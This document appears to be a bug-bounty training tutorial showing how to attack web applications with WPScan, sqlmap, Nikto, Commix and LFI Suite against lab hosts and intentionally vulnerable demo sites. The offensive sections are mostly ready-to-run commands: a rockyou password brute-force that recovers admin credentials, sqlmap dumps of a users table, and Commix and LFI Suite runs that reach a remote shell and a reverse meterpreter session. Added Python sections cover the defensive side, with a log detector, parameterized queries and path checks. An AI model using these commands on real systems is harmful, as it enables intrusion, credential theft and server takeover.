Bug Bounty Training Program


TABLE OF CONTENTS

1 WPscan 4
2 Enumerating WordPress Plugins 6
2.1 Enumerate themes, plugins and usernames with a single command 7
2.2 Brute-force attack using WPScan 8
3 SQLMap 11
3.1 Database Penetration Testing using Sqlmap 11
3.2 Databases 12
3.3 Tables 13
3.4 Columns 14
3.5 Get data from a table 15
3.6 Dump All 16
4 Nikto 18
4.1 Options present in Nikto 18
5 Commix 24
6 LFI Suite 29
7 About Us 34

www.hackingarticles.in Page | 2
WPscan
“WordPress is one of the most powerful CMS platforms, covering about 35% of all websites on the
internet.” To enumerate such web applications we’ll be using “WPScan”, a black-box vulnerability
scanner for WordPress written in Ruby that focuses on the vulnerabilities present in WordPress
installations, whether in the core, the themes or the plugins.
WPScan comes preinstalled in Kali Linux, SamuraiWTF, Pentoo and BlackArch; it compares what it
finds on the target against its vulnerability database to report outdated versions and known
vulnerabilities in the target’s web application.
Let’s look at the main things WPScan can do for us:
• Detect the version of the installed WordPress.
• Detect sensitive files such as readme, robots.txt, database backup files, etc.
• Detect enabled features of the installed WordPress server, such as file upload.
• Enumerate themes and plugins along with their versions and report whether they are outdated.
• Scan the web application to list the available usernames.

As discussed earlier, WPScan is installed by default on Kali Linux, so let’s look at the default usage
options by running the following command in the terminal.

wpscan -hh

Scanning the WordPress version of the target’s website
Now that we have seen the default options, let’s run a basic scan over the vulnerable WordPress
web application that we set up in our earlier article.

Type the following command to scan the WordPress application and its server.

wpscan --url http://192.168.1.105/wordpress/

From the image below you can see that it reports everything it could find: the WordPress version,
the Apache server version, and the fact that the upload directory has directory listing enabled,
which means anyone can browse to “/wp-content/uploads” to view the uploaded files and their
contents.

Enumerating WordPress Plugins
Plugins are small pieces of code that, when added to a WordPress web application, extend its
functionality and enhance the website’s features.
But plugins can also cause great damage to the web application when their code is loosely
written.
Let’s check the installed plugins on our target’s web application by executing the command
below:

wpscan --url http://192.168.1.105/wordpress/ -e ap

Just as with themes, we can restrict the list to plugins with known vulnerabilities by using “-e vp”.

After a few seconds WPScan prints the result. From the image below you can see that the plugins
“mail-masta” and “reflex-gallery” are installed on our target’s website. As a bonus, we also get the
date of the last update and the latest available version.

Enumerate themes, plugins and usernames with a single command
Does WPScan let us scan the web application for everything in one go, whether it is the version,
the installed themes or the plugins?
Let’s find out!
Run the following command to grab everything we scanned above for our target web application.

wpscan --url http://192.168.1.105/wordpress/ -e at -e ap -e u

-e at: enumerate all themes of the targeted website

-e ap: enumerate all plugins of the targeted website

-e u: enumerate all usernames of the targeted website

Brute-force attack using WPScan
With the usernames we enumerated earlier we can build a word list of all the users and try a
brute-force login attack using the default password list, “rockyou.txt”. You can learn more about
cracking WordPress logins from here.
From the image below you can see our wordlist.

Let’s now try to recover the site’s login credentials using the following command:

wpscan --url http://192.168.1.105/wordpress/ -U user.txt -P /usr/share/wordlists/rockyou.txt

The -U and -P flags set the username list and the password list respectively.

It tries each username/password combination and then prints the result; from the image you can
see that we found valid login credentials.

Great!! We got the admin credentials as “admin : jessica”. Let’s log into the application’s
dashboard with them.
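As an added, defensive counterpart to the enumeration and brute-force steps above (this code is not part of the original article or of WPScan), the following script flags the traces such a run leaves in a web server's access log: the WPScan user-agent, plugin readme.txt probes, ?author=N user enumeration and a burst of login POSTs. The combined log format, the sample lines and the 20-request threshold are assumptions made for the demo.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" access-log format (assumed; adjust for other formats).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PLUGIN_README = re.compile(r"/wp-content/plugins/([^/]+)/readme\.txt$")  # -e ap probes
AUTHOR_ENUM = re.compile(r"[?&]author=\d+")                              # -e u probes

# Constructed sample lines modelled on the requests described in the text;
# they were not captured from a real server.
UA_SCAN = "WPScan v3 (https://wpscan.com/wordpress-security-scanner)"
UA_USER = "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"
SAMPLE_LINES = [
    '192.168.1.50 - - [10/Mar/2024:10:00:01 +0000] "GET /wordpress/ HTTP/1.1" 200 8120 "-" "%s"' % UA_SCAN,
    '192.168.1.50 - - [10/Mar/2024:10:00:02 +0000] "GET /wordpress/wp-content/plugins/mail-masta/readme.txt HTTP/1.1" 200 512 "-" "%s"' % UA_SCAN,
    '192.168.1.50 - - [10/Mar/2024:10:00:02 +0000] "GET /wordpress/wp-content/plugins/reflex-gallery/readme.txt HTTP/1.1" 200 640 "-" "%s"' % UA_SCAN,
    '192.168.1.50 - - [10/Mar/2024:10:00:03 +0000] "GET /wordpress/?author=1 HTTP/1.1" 301 0 "-" "%s"' % UA_SCAN,
    '192.168.1.77 - - [10/Mar/2024:10:00:09 +0000] "GET /wordpress/?p=12 HTTP/1.1" 200 9100 "-" "%s"' % UA_USER,
] + [
    # the -U/-P run: one POST per username/password guess (WPScan may use
    # wp-login.php or xmlrpc.php for these)
    '192.168.1.50 - - [10/Mar/2024:10:01:%02d +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 3400 "-" "%s"' % (i, UA_USER)
    for i in range(25)
]


def analyse(lines, login_threshold=20):
    """Return {ip: [reasons]} for sources whose requests look like a WPScan run."""
    per_ip = defaultdict(lambda: {"plugins": set(), "author": 0, "logins": 0, "scanner_ua": False})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip it rather than abort the whole run
        rec = per_ip[m["ip"]]
        path = m["path"].split("?", 1)[0]
        if "wpscan" in m["ua"].lower():
            rec["scanner_ua"] = True
        pm = PLUGIN_README.search(path)
        if pm:
            rec["plugins"].add(pm.group(1))
        if AUTHOR_ENUM.search(m["path"]):
            rec["author"] += 1
        if m["method"] == "POST" and path.endswith(("/wp-login.php", "/xmlrpc.php")):
            rec["logins"] += 1

    findings = {}
    for ip, rec in per_ip.items():
        reasons = []
        if rec["scanner_ua"]:
            reasons.append("WPScan user-agent")
        if len(rec["plugins"]) >= 2:
            reasons.append("plugin enumeration: " + ", ".join(sorted(rec["plugins"])))
        if rec["author"]:
            reasons.append("author id enumeration (?author=N)")
        if rec["logins"] >= login_threshold:
            reasons.append("%d login POSTs (wp-login.php/xmlrpc.php)" % rec["logins"])
        if reasons:
            findings[ip] = reasons
    return findings


if __name__ == "__main__":
    for ip, reasons in analyse(SAMPLE_LINES).items():
        print(ip, "->", "; ".join(reasons))
```

Feed it a real file with `analyse(open("access.log").read().splitlines())`; the same counters are what a fail2ban jail or a rate limit on wp-login.php and xmlrpc.php would act on.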

SQLMap
SQLMap is an open-source penetration testing tool that automates the process of detecting and
exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection
engine, many niche features for the ultimate penetration tester and a broad range of switches ranging
from database fingerprinting, through fetching data from the database, to accessing the underlying file
system and executing commands on the operating system via out-of-band connections.

Database Penetration Testing using Sqlmap

Sometimes you visit websites that let you select a product through a picture gallery; if you observe
the URL, you will notice that the product is requested through its product-ID number.
Let’s take an example:

http://testphp.vulnweb.com/artists.php?artist=1

When an attacker visits such a website, he first checks the web server for a SQL injection
vulnerability before launching a SQL attack.

Let’s check how the attacker verifies the SQL vulnerability.

The attacker tries to break the query in order to get an error message; if an error message comes
back, it confirms that the web server is affected by SQL injection.

http://testphp.vulnweb.com/artists.php?artist=1'

From the screenshot you can see that we received the error message, so we can now mount a SQL
attack on the web server to fetch database information.
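An added illustration (not from the original article) of why the stray quote above produces an error, using an in-memory SQLite table as a constructed stand-in for the site's artists table: the concatenated query fails on artist=1' while the parameterised version treats the same value as data.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the 'artists' table; the real schema is not shown on the page."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE artists (artist_id INTEGER, aname TEXT)")
    conn.executemany("INSERT INTO artists VALUES (?, ?)",
                     [(1, "artist one"), (2, "artist two"), (3, "artist three")])
    return conn


def lookup_vulnerable(conn, artist):
    # The request parameter is spliced into the SQL text, so artist=1' leaves an
    # unbalanced quote and the DBMS answers with a syntax error: exactly the
    # signal the text above uses to confirm the injection.
    sql = "SELECT aname FROM artists WHERE artist_id = '" + artist + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, artist):
    # Bound parameter: the value is never parsed as SQL, so 1' is just an id
    # that matches nothing and no error text reaches the user.
    sql = "SELECT aname FROM artists WHERE artist_id = ?"
    return [row[0] for row in conn.execute(sql, (artist,))]


def probe(conn, lookup, artist):
    """Return ('ok', rows) or ('error', message): the two responses a page can give."""
    try:
        return ("ok", lookup(conn, artist))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1'"):
        print("vulnerable", repr(value), probe(db, lookup_vulnerable, value))
        print("safe      ", repr(value), probe(db, lookup_safe, value))
```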

Databases
For database penetration testing we always choose SQLMap; the tool is very helpful for beginners
who are unable to retrieve database information manually or are unaware of SQL injection techniques.
Open the terminal in your Kali Linux and type the following command, which starts the SQL injection
attack on the targeted website.

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch

-u: target URL

--dbs: fetch the database names

--batch: let sqlmap use its default behaviour whenever user input would be required

From the screenshot you can see that we have successfully retrieved the database name “acuart”.

Tables
A database is a set of records organised in multiple tables, so we now use another command to
fetch all the table names from inside the database.

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --batch

-D: DBMS database to enumerate (the database name fetched above)

--tables: enumerate the tables of the DBMS database

As the screenshot shows, we have enumerated all the table names of the database. There are 8
tables inside the database “acuart”:
T1: artists
T2: carts
T3: categ
T4: featured
T5: guestbook
T6: pictures
T7: products
T8: users

Columns
Next we enumerate the column names of the desired table. We know there is a users table inside
the database acuart and we want all the column names of that table, so we run another command
for column enumeration.

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch

-T: DBMS table to enumerate (the table name fetched above)

--columns: enumerate the columns of the DBMS table

Get data from a table
Step by step we have uncovered many details of the database, but the last and most important step
is to retrieve the information held in the columns of a table. So finally we run a command that dumps
the contents of the users table.

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch

--dump: dump all entries of the DBMS table

From the screenshot you can see that it has dumped the entire contents of the users table; the users
table usually holds the login credentials of the application’s users, which could be used to log into
the server as those users.

Dump All
The last command is the most powerful command in sqlmap and will save you time in database
penetration testing: it performs all the above steps at once and dumps the entire database,
including table names, columns and records.

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --dump-all --batch

This gives you everything at once, from the database name to the records of each table.
Try it yourself!

Nikto
Nikto examines a web server to find potential problems and security vulnerabilities, including:

• Server and software misconfigurations
• Default files and programs
• Insecure files and programs
• Outdated servers and programs
Nikto is built on LibWhisker (by RFP) and can run on any platform that has a Perl environment. It
supports SSL, proxies, host authentication, IDS evasion and more.

Options present in Nikto

To see all the available options we run “nikto -help”.

Below are all of the Nikto command-line options with explanations. A brief version of this text is
available by running Nikto with the -h (-help) option.

• -ask: Whether to ask about submitting updates: yes (ask about each, the default), no (don't
ask, just send), auto (don't ask, just send).

• -Cgidirs: Scan these CGI directories. The special words "none" or "all" may be used to scan no CGI
directories or all of them, respectively. A literal value for a CGI directory such as "/cgi-test/" may
be specified (must include the trailing slash). If this option is not specified, all CGI directories
listed in nikto.conf will be tested.

• -config: Specify an alternative config file to use instead of the nikto.conf file located in the
install directory.

• -dbcheck: Check the scan databases for syntax errors.

• -Display: Control the output that Nikto shows. See Chapter 5 for detailed information on these
options. Use the reference number or letter to specify the type. Multiple may be used:
1 - Show redirects
2 - Show cookies received
3 - Show all 200/OK responses
4 - Show URLs which require authentication
D - Debug Output
E - Display all HTTP errors
P - Print progress to STDOUT
V - Verbose Output

• -evasion: Specify the LibWhisker encoding/evasion technique to use (see the LibWhisker docs
for detailed information on these). Note that these are not likely to actually bypass a modern
IDS system, but may be useful for other purposes. Use the reference number to specify the
type, multiple may be used:
1 - Random URI encoding (non-UTF8)
2 - Directory self-reference (/./)
3 - Premature URL ending
4 - Prepend long random string
5 - Fake parameter
6 - TAB as request spacer
7 - Change the case of the URL
8 - Use Windows directory separator (\)
A - Use a carriage return (0x0d) as a request spacer
B - Use binary value 0x0b as a request spacer

• -findonly: Only discover the HTTP(S) ports, do not perform a security scan. This will attempt
to connect with HTTP or HTTPS, and report the Server header. Note that as of version 2.1.4, -
findonly has been deprecated and simply sets '-Plugins "@@NONE"' which will override any
command line or config file settings for -Plugins.

• -Format: Save the output file specified with the -o (-output) option in this format. If not specified,
the default will be taken from the file extension specified in the -output option. Valid formats
are:
csv - a comma-separated list
htm - an HTML report
msf - log to Metasploit
txt - a text report
xml - an XML report

• -host: Host(s) to target. Can be an IP address, hostname or text file of hosts. A single dash (-)
may be used for stdin. Can also parse nmap -oG style output.

• -Help: Display extended help information.

• -id: ID and password to use for host Basic authentication. Format is "id:password".

• -IgnoreCode: Ignore these HTTP codes as negative responses (always). Format is "302,301".

• -list-plugins: Will list all plugins that Nikto can run against targets and then will exit without
performing a scan. These can be tuned for a session using the -Plugins option.

• -mutate: Specify mutation technique. A mutation will cause Nikto to combine tests or attempt
to guess values. These techniques may cause a tremendous amount of tests to be launched
against the target. Use the reference number to specify the type, multiple may be used:
1 - Test all files with all root directories
2 - Guess for password file names
3 - Enumerate user names via Apache (/~user type requests)
4 - Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)
5 - Attempt to brute force sub-domain names, assume that the host name is the
parent domain
6 - Attempt to guess directory names from the supplied dictionary file

• -mutate-options: Provide extra information for mutates, e.g. a dictionary file

• -nolookup: Do not perform name lookups on IP addresses.

• -nocache: Disable response cache

• -nointeractive: Disable interactive features

• -nossl: Do not use SSL to connect to the server.

• -no404: Disable 404 (file not found) checking. This will reduce the total number of requests
made to the webserver and may be preferable when checking a server over a slow link, or an
embedded device. This will generally lead to more false positives being discovered.

• -output: Write output to the file specified. The format used will be taken from the file
extension. This can be overridden by using the -Format option (e.g., to write text files with a
different extension). Existing files will have new information appended.

• -Plugins: Select which plugins will be run on the specified targets. A semi-colon separated list
should be provided which lists the names of the plugins. The names can be found by using -
list-plugins.
There are two special entries: @@ALL, which specifies all plugins shall be run and @@NONE,
which specifies no plugins shall be run. The default is @@DEFAULT

• -port: TCP port(s) to target. To test more than one port on the same host, specify the list of
ports in the -p (-port) option. Ports can be specified as a range (i.e., 80-90), or as a comma-
delimited list, (i.e., 80,88,90). If not specified, port 80 is used.

• -Pause: Seconds (integer or floating point) to delay between each test.

• -root: Prepend the value specified to the beginning of every request. This is useful to test
applications or web servers which have all of their files under a certain directory.

• -ssl: Only test SSL on the ports specified. Using this option will dramatically speed up requests
to HTTPS ports, since otherwise the HTTP request will have to timeout first.

• -Save: Save request/response of findings to this directory. Files are plain text and will contain
the raw request/response as well as JSON strings for each. Use a "." to auto-generate a
directory name for each target. These saved items can be replayed by using the included
replay.pl script, which can route items through a proxy.

• -timeout: Seconds to wait before timing out a request. Default timeout is 10 seconds.

• -Tuning: Tuning options will control the test that Nikto will use against a target. By default, all
tests are performed. If any options are specified, only those tests will be performed. If the "x"
option is used, it will reverse the logic and exclude only those tests. Use the reference number
or letter to specify the type, multiple may be used:
0 - File Upload
1 - Interesting File / Seen in logs
2 - Misconfiguration / Default File
3 - Information Disclosure
4 - Injection (XSS/Script/HTML)
5 - Remote File Retrieval - Inside Web Root
6 - Denial of Service
7 - Remote File Retrieval - Server Wide
8 - Command Execution / Remote Shell
9 - SQL Injection
a - Authentication Bypass
b - Software Identification
c - Remote Source Inclusion
x - Reverse Tuning Options (i.e., include all except specified)
The given string will be parsed from left to right, any x characters will apply to all characters
to the right of the character.

• -Userdbs: Load user defined databases instead of standard databases. User defined databases
follow the same syntax as the standard files, but are prefixed with a 'u', e.g., 'udb_tests'
all - Disable all standard databases and load only user databases
tests - Disable db_tests and load udb_tests. All other databases are loaded normally.

• -until: Run until the specified time or duration, then pause.

• -update: Update the plugins and databases directly from cirt.net.

• -useproxy: Use the HTTP proxy defined in the configuration file. The proxy may also be directly
set as an argument.

• -Version: Display the Nikto software, plugin and database versions.

• -vhost: Specify the Host header to be sent to the target.

Let’s scan our bWAPP instance using Nikto to find the potential problems and vulnerabilities present.

nikto -host http://192.168.218.131/bWAPP/

Commix
Fuzzing by hand consumes a lot of time and can become frustrating when performing a command
injection attack, i.e. waiting for each incremented payload and checking every possible response it
drops.
To make the attack simpler and faster we’ll be using a Python-scripted automated tool, “Commix”,
which makes it very easy to find a command injection vulnerability and then helps us exploit it. You
can learn more about Commix from here.
So let’s try to take over the web application again by getting a commix session on our Kali machine.
From the image below you can see that I’ve set the security level to high and set the “Choose your
bug” option to “OS Command Injection”.

Commix works with the session cookies. To get them I’ll capture the browser’s request in Burp Suite
by enabling the proxy and intercept options; as I hit the Lookup button, the request details are
presented in Burp Suite’s Proxy tab.

Fire up your Kali terminal with commix and run the following command with the Referer, Cookie and
target values:

commix --url="http://192.168.0.11/bWAPP/commandi.php" --cookie="security_level=2; PHPSESSID=cc91040cc70b9abdb2fdc637527bf132" --data="target=www.nsa.gov&form=submit"

Type ‘y’ to resume the classic injection point, and ‘y’ again to open the pseudo-terminal shell.

Great!! We’re into our target’s machine.


What if we could convert this commix shell into a meterpreter one?
As soon as we have the commix session, we’ll generate a reverse meterpreter session from the
target machine by executing the following commands:

reverse_tcp

set lhost 192.168.0.9

set lport 4444

As we hit enter, it asks whether we want a netcat shell or another (meterpreter) one. Choose
option 2 and hit enter again.

Now a new list pops up asking which meterpreter payload we want, i.e. whether it should be PHP,
Windows, Python, etc. As our target server runs PHP, we select option 8, i.e. a PHP meterpreter
reverse shell.

When everything is done, it provides a resource file together with the command to execute it. Open
a new terminal window and type the presented command there; in our case it generated the
following command:

msfconsole -r /usr/share/commix/php_meterpreter.rc

Cool!! It’s great to see that our commix session now has some new wings.
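As an added note on the server side of this attack (example code, not from the article or from Commix), the snippet below contrasts the concatenated command string that makes a page like commandi.php injectable with an allow-listed argv call, and uses shlex to show how a POSIX shell would split the unsafe string. The ping command, the hostname pattern and the sample inputs are assumptions made for the demo.

```python
import re
import shlex
import subprocess

# RFC 1123-style hostname: labels of letters, digits and inner hyphens (assumed allow-list).
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def build_vulnerable(target):
    # The pattern behind a page like commandi.php: the form value is pasted
    # into one command string that is later handed to a shell.
    return "ping -c 1 " + target


def shell_view(cmd):
    """Tokenise cmd the way a POSIX shell would (nothing is executed) and
    return the list of separate commands it contains."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    commands, current = [], []
    for tok in lexer:
        if tok in (";", "&&", "||", "|", "&"):
            commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def build_safe(target):
    """Validate the value, then return an argv list: no shell ever parses it."""
    if not HOSTNAME_RE.match(target):
        raise ValueError("target is not a plain hostname")
    return ["ping", "-c", "1", target]


def run_safe(target):
    # A list argv means shell=False, so metacharacters in `target` are inert;
    # the allow-list above additionally keeps ping's own option parsing honest.
    return subprocess.run(build_safe(target), capture_output=True, text=True, timeout=5)


if __name__ == "__main__":
    for value in ("www.nsa.gov", "www.nsa.gov; whoami"):   # constructed inputs
        print(repr(value), "-> shell sees", shell_view(build_vulnerable(value)))
        try:
            print("   safe argv:", build_safe(value))
        except ValueError as exc:
            print("   rejected:", exc)
```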

LFI Suite
Performing an LFI attack with Burp Suite can get frustrating, i.e. waiting for each incremented
payload and checking every possible response it shows. To make this task simpler and faster we’ll be
using an automated tool called LFI Suite. It scans the website’s URL and, if the site is found
vulnerable, displays all the possible results, which we can then use to gain a remote shell on the
website. You can download it from here.
First we clone LFI Suite and boot it up on our Kali machine with the following commands:

git clone https://github.com/D35m0nd142/LFISuite.git

cd LFISuite

python lfisuite.py

Choose the 2nd option, “Scanner”, to check the possible input parameters.
Now it asks us to “enter the cookies”; I’ve installed the “HTTP Header Live” plugin to capture the
HTTP requests as they pass.

From the image below you can see that I’ve pasted the captured cookies into the cookies field and
disabled the Tor proxy. We just need to enter the website’s URL and hit enter.

The scan starts and we can see that there are 40 different parameters through which we can
exploit the LFI vulnerability in our web application.

Now it’s time to connect to the victim and take over the website by capturing its remote shell.
Restart the application and this time choose option 1, “Exploiter”. Fill in the required fields with the
same cookies we used in the scanner section and set the Tor proxy to “No”.

As soon as you hit enter, you’ll see a list with multiple ways to attack the web server.
Select option 9, “Auto Hack”.
A new prompt asks for the website’s URL; enter the target website and hit enter.

http://192.168.0.11/bWAPP/rlfi.php?language=

Cool!! We’ve successfully captured the victim’s command shell.
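As an added defensive counterpart (not part of the original article or of LFI Suite), the following code shows the containment check that a language-include parameter like the one in rlfi.php needs: the requested name is resolved under a fixed directory and rejected if it escapes it, whether through "../" segments, an absolute path or an embedded null byte. The directory layout is constructed in a temporary directory for the demo.

```python
import os
import tempfile


def safe_include_path(root, requested):
    """Return the absolute path for `requested` only if it stays inside `root`."""
    if "\0" in requested:
        raise PermissionError("null byte in requested name")
    root_real = os.path.realpath(root)
    # os.path.join discards `root` when `requested` is absolute, and realpath
    # folds "../" segments and symlinks, so the containment test below sees the
    # path the OS would actually open.
    candidate = os.path.realpath(os.path.join(root_real, requested))
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise PermissionError("%r escapes %s" % (requested, root))
    if not os.path.isfile(candidate):
        raise FileNotFoundError(requested)
    return candidate


def build_demo_tree():
    """Constructed layout: a languages/ directory plus one file outside it."""
    base = tempfile.mkdtemp(prefix="lfi-demo-")
    lang_dir = os.path.join(base, "languages")
    os.mkdir(lang_dir)
    with open(os.path.join(lang_dir, "lang_en.php"), "w") as fh:
        fh.write("<?php $lang = 'en'; ?>\n")
    with open(os.path.join(base, "secret.txt"), "w") as fh:
        fh.write("must never be included\n")
    return lang_dir


def classify(lang_dir, requested):
    """'allowed', 'blocked' (escapes the directory) or 'missing'."""
    try:
        safe_include_path(lang_dir, requested)
        return "allowed"
    except PermissionError:
        return "blocked"
    except FileNotFoundError:
        return "missing"


if __name__ == "__main__":
    d = build_demo_tree()
    for value in ("lang_en.php", "../secret.txt", "/etc/passwd", "lang_fr.php"):
        print(repr(value), "->", classify(d, value))
```

An allow-list of the known language names is stricter still, and a path check does nothing against stream wrappers such as php://, which an include must simply never accept.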

Reference:
• https://www.hackingarticles.in/comprehensive-guide-to-local-file-inclusion/
• https://www.hackingarticles.in/comprehensive-guide-on-os-command-injection/
• https://www.hackingarticles.in/comprehensive-guide-to-sqlmap-target-options15249-2/
• https://www.hackingarticles.in/wpscanwordpress-pentesting-framework/
• https://cirt.net/nikto2-docs/
